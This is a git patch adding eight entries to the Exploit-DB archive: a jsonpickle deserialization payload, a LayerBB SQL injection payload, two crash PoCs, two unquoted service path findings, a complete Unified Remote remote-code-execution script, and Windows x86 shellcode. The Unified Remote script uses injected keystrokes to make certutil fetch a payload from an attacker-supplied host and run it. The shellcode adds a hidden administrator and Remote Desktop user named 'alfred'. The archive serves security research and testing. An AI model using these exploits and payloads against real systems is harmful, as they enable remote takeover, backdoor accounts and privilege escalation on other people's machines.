From 338282491bebf31e527e0c61b96b0761b0187ab5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 Feb 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-02-25 8 changes to exploits/shellcodes SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path python jsonpickle 2.0.0 - Remote Code Execution Unified Remote 3.9.0.2463 - Remote Code Execution LayerBB 1.1.4 - 'search_query' SQL Injection Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) --- exploits/multiple/remote/49585.py | 27 ++++++ exploits/php/webapps/49593.txt | 10 +++ exploits/windows/dos/49589.py | 30 +++++++ exploits/windows/dos/49590.py | 30 +++++++ exploits/windows/local/49586.txt | 28 ++++++ exploits/windows/local/49588.txt | 28 ++++++ exploits/windows/remote/49587.py | 137 ++++++++++++++++++++++++++++++ files_exploits.csv | 7 ++ files_shellcodes.csv | 1 + shellcodes/windows_x86/49592.asm | 84 ++++++++++++++++++ 10 files changed, 382 insertions(+) create mode 100755 exploits/multiple/remote/49585.py create mode 100644 exploits/php/webapps/49593.txt create mode 100755 exploits/windows/dos/49589.py create mode 100755 exploits/windows/dos/49590.py create mode 100644 exploits/windows/local/49586.txt create mode 100644 exploits/windows/local/49588.txt create mode 100755 exploits/windows/remote/49587.py create mode 100644 shellcodes/windows_x86/49592.asm diff --git a/exploits/multiple/remote/49585.py b/exploits/multiple/remote/49585.py new file mode 100755 index 000000000..7e2c98b6a --- /dev/null +++ b/exploits/multiple/remote/49585.py @@ -0,0 +1,27 @@ +# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution +# Date: 24-2-2021 +# Vendor Homepage: https://jsonpickle.github.io +# Exploit Author: Adi Malyanker, Shay Reuven +# Software Link: https://github.com/jsonpickle/jsonpickle +# Version: 2.0.0 +# Tested on: windows, linux + +# Python is an open source language. jsonickle module is provided to convert objects into a serialized form, +# and later recover the data back into an object. the decode is used to undeserialize serialized strings. + +# If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls. +# the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr". + +# The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet + +# the payload was found during our research made on deserialization functions. + +# the pattern should be : +# {..{"py/repr":/}..} + +# example: + +malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}' + +# the command on the server side +some_parameter = jsonpickle.decode(malicious) \ No newline at end of file diff --git a/exploits/php/webapps/49593.txt b/exploits/php/webapps/49593.txt new file mode 100644 index 000000000..2d0870a50 --- /dev/null +++ b/exploits/php/webapps/49593.txt @@ -0,0 +1,10 @@ +# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection +# Date: 2021-02-19 +# Exploit Author: Görkem Haşin +# Version: 1.1.4 +# Tested on: Linux/Windows + +# POST /search.php HTTP/1.1 +# Host: Target + +Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search \ No newline at end of file diff --git a/exploits/windows/dos/49589.py b/exploits/windows/dos/49589.py new file mode 100755 index 000000000..477583e4a --- /dev/null +++ b/exploits/windows/dos/49589.py @@ -0,0 +1,30 @@ +# Exploit Title: SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) +# Exploit Author : Sinem Şahin +# Exploit Date: 2021-02-10 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe +# Tested on: Windows 7 x64 +# Version: 5.3.5 + + +# Steps: + 1- Run the python script. (exploit.py) + 2- Open payload.txt and copy content to clipboard. + 3- Run 'SpotAuditor 5.3.5'. + 4- Register -> Enter Registration Code + 5- Paste clipboard into the "Name" or "Key". + 6- Click on OK. + 7- Crashed. + +---> exploit.py <-- + +#!/usr/bin/env python +buffer = "\x41" * 300 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print"File okey!!" +except: + print "File is not created." \ No newline at end of file diff --git a/exploits/windows/dos/49590.py b/exploits/windows/dos/49590.py new file mode 100755 index 000000000..c4e9c98f8 --- /dev/null +++ b/exploits/windows/dos/49590.py @@ -0,0 +1,30 @@ +# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) +# Exploit Author : Sinem Şahin +# Exploit Date: 2021-02-23 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe +# Version: 4.2.7 +# Tested on: Windows 7 x64 + + +# Steps: +1- Run the python script. (exploit.py) +2- Open payload.txt and copy content to clipboard. +3- Run 'Product Key Explorer 4.2.7'. +4- Register -> Enter Registration Code +5- Paste clipboard into the "Key" or "Name". +6- Click on OK. +7- Crashed. + +---> exploit.py <-- + +#!/usr/bin/env python +buffer = "\x41" * 300 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print "File created!" +except: + print "File cannot be created!!" \ No newline at end of file diff --git a/exploits/windows/local/49586.txt b/exploits/windows/local/49586.txt new file mode 100644 index 000000000..703c9ae4e --- /dev/null +++ b/exploits/windows/local/49586.txt @@ -0,0 +1,28 @@ +# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path +# Discovery by: Victor Mondragón +# Discovery Date: 23-02-2021 +# Vendor Homepage: https://www.softros.com/ +# Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi +# Tested Version: 8.1 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 7 Service Pack 1 x64 +# Step to discover Unquoted Service Path: + + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ +LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto + + +C:\>sc qc LogonExpertSvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: LogonExpertSvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe + LOAD_ORDER_GROUP : LogonExpertGroup + TAG : 0 + DISPLAY_NAME : LogonExpert Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49588.txt b/exploits/windows/local/49588.txt new file mode 100644 index 000000000..cf5a8c511 --- /dev/null +++ b/exploits/windows/local/49588.txt @@ -0,0 +1,28 @@ +# Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path +# Discovery by: Victor Mondragón +# Discovery Date: 23-02-2021 +# Vendor Homepage: https://www.softros.com/ +# Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe +# Tested Version: 9.6.4 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Pro 64 bits + +# Step to discover Unquoted Service Path: + + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ +Softros Spell Checker SoftrosSpellChecker C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe Auto + +C:\>sc qc SoftrosSpellChecker +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: SoftrosSpellChecker + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe + GRUPO_ORDEN_CARGA : System Reserved + ETIQUETA : 0 + NOMBRE_MOSTRAR : Softros Spell Checker + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/remote/49587.py b/exploits/windows/remote/49587.py new file mode 100755 index 000000000..f90874c95 --- /dev/null +++ b/exploits/windows/remote/49587.py @@ -0,0 +1,137 @@ +# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution +# Author: H4rk3nz0 +# Vendor Homepage: https://www.unifiedremote.com/ +# Software Link: https://www.unifiedremote.com/download +# Tested on: Windows 10, 10.0.19042 Build 19042 + +#!/usr/bin/python + +import socket +import sys +import os +from time import sleep + +target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +port = 9512 + +# Packet Data Declarations; Windows, Space and Enter have non-standard values + +open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862" +"2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400" +"0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831" +"000356657273696f6e000000000a00").decode("hex") + +open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7" +"3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453" +"796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646" +"5643430373664653736366464363134343336313938303961643766333538353864343439320008526571" +"75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000" +).decode("hex") + +one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024" +"c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756" +"5730002000556616c756500").decode("hex") + +two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007" +"0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex") + +three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730" +"386531346535323834636238310000").decode("hex") + +win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726" +"400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065" +"6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797" +"0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055" +"6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6" +"9642d643730386531346535323834636238310000").decode("hex") + +ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172" +"6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000" +"656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000" +"08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730" +"002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365" +"00616e64726f69642d643730386531346535323834636238310000").decode("hex") + +space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6" +"1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617" +"3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650" +"00008547970650008000000085265717565737400070252756e0002457874726173000656616c756" +"5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726" +"36500616e64726f69642d643730386531346535323834636238310000").decode("hex") + +# ASCII to Hex Conversion Set +characters={ + "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", + "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", + "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", + "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", + "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", + "+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", + ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", + "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", + "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} + +# User Specified arguments +try: + rhost = sys.argv[1] + lhost = sys.argv[2] + payload = sys.argv[3] +except: + print("Usage: python " + sys.argv[0] + " ") + + +# Send Windows Key Input Twice +def SendWin(): + target.sendto(win_key,(rhost, port)) + target.sendto(win_key,(rhost, port)) + sleep(0.4) + + +# Send Enter/Return Key Input +def SendReturn(): + target.sendto(ret_key,(rhost, port)) + sleep(0.4) + +# Send String Characters +def SendString(string, rhost): + for char in string: + if char == " ": + target.sendto(space_key,(rhost, port)) + sleep(0.02) + else: + convert = characters[char].decode("hex") + target.sendto(one + convert + two + convert + three,(rhost, port)) + sleep(0.02) + +# Main Execution +def main(): + target.connect((rhost,port)) + sleep(0.5) + print("[+] Connecting to target...") + target.sendto(open,(rhost,port)) # Initialize Connection to Unified + sleep(0.02) + target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection + print("[+] Popping Start Menu") + sleep(0.02) + SendWin() + sleep(0.3) + print("[+] Opening CMD") + SendString("cmd.exe", rhost) + sleep(0.3) + SendReturn() + sleep(0.3) + print("[+] *Super Fast Hacker Typing*") + SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload + sleep(0.3) + print("[+] Downloading Payload") + SendReturn() + sleep(3) + SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload + sleep(0.3) + SendReturn() + print("[+] Done! Check listener?") + target.close() + +if __name__=="__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d38b8bb4f..4564adff9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6755,6 +6755,8 @@ id,file,description,date,author,type,platform,port 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows, 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows, 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux, +49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows, +49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows, 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows, 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows, 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows, @@ -11175,6 +11177,8 @@ id,file,description,date,author,type,platform,port 48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows, 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows, 49577,exploits/windows/local/49577.py,"dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)",2021-02-19,"Kağan Çapar",local,windows, +49586,exploits/windows/local/49586.txt,"LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows, +49588,exploits/windows/local/49588.txt,"Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows, 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos, 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows, 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows, @@ -18355,6 +18359,8 @@ id,file,description,date,author,type,platform,port 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple, 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple, 49584,exploits/windows/remote/49584.py,"HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)",2021-02-23,Pergyz,remote,windows, +49585,exploits/multiple/remote/49585.py,"python jsonpickle 2.0.0 - Remote Code Execution",2021-02-24,"Adi Malyanker",remote,multiple, +49587,exploits/windows/remote/49587.py,"Unified Remote 3.9.0.2463 - Remote Code Execution",2021-02-24,H4rk3nz0,remote,windows, 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple, 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php, 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple, @@ -43775,3 +43781,4 @@ id,file,description,date,author,type,platform,port 49569,exploits/php/webapps/49569.txt,"Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-17,"Suresh Kumar",webapps,php, 49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php, 49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php, +49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index c8766c1ef..7bafdcd84 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1031,3 +1031,4 @@ id,file,description,date,author,type,platform 49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux 49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64 +49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86 diff --git a/shellcodes/windows_x86/49592.asm b/shellcodes/windows_x86/49592.asm new file mode 100644 index 000000000..6e8966f71 --- /dev/null +++ b/shellcodes/windows_x86/49592.asm @@ -0,0 +1,84 @@ +# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) +# Exploit Author: Armando Huesca Prida +# Date: 20-02-2021 +# +# Tested on: +# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86) +# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86) +# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86) +# +# Description: +# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses. +# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters. +# +# Shellcode considerations: +# Function address of CreateProcessA in kernel32.dll: 0x77082082 +# Function address of ExitProcess in kernel32.dll: 0x770d214f +# Administartor user credentials: alfred:test +# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;) +# + + +# Assembly shellcode: + +global _start + +section .text + +_start: +jmp application + +firststep: +pop edi +xor eax, eax +mov esi, 0x111111A9 +sub esi, 0x11111111 +mov [edi+esi], al ; size of message db parameter + +StartUpInfoANDProcessInformation: +push eax; hStderror null in this case +push eax; hStdOutput, null +push eax; hStdInput, null +xor ebx, ebx +xor ecx, ecx +add cl, 0x12; 18 times loop to fill both structures. + +looper: +push ebx +loop looper + +;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo +mov bx, 0x1111 +sub bx, 0x1010 +mov word [esp+0x3c], bx +mov byte [esp+0x10], 0x44; cb=3D0x44 +lea eax, [esp+0x10]; eax points to StartUpInfo + +; eax holds a pointer to StartUPinfo +; esp holds a pointer to Process_Info filled of null values + +createprocessA: +push esp; pointer to Process-Info +push eax; pointer to StartUpInfo +xor ebx, ebx +push ebx; null +push ebx; null +push ebx; null +inc ebx +push ebx; bInheritHandles=3Dtrue +dec ebx +push ebx; null +push ebx; null +push edi; pointer to message db string +push ebx; null +mov edx, 0x77082082; CreateProcessA addr in kernel32.dll +call edx + +ExitProcess: +push eax; createprocessA return in eax +mov edx, 0x770d214f; ExitProcess addr in kernel32.dll +call edx + +application: +call firststep +message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add' \ No newline at end of file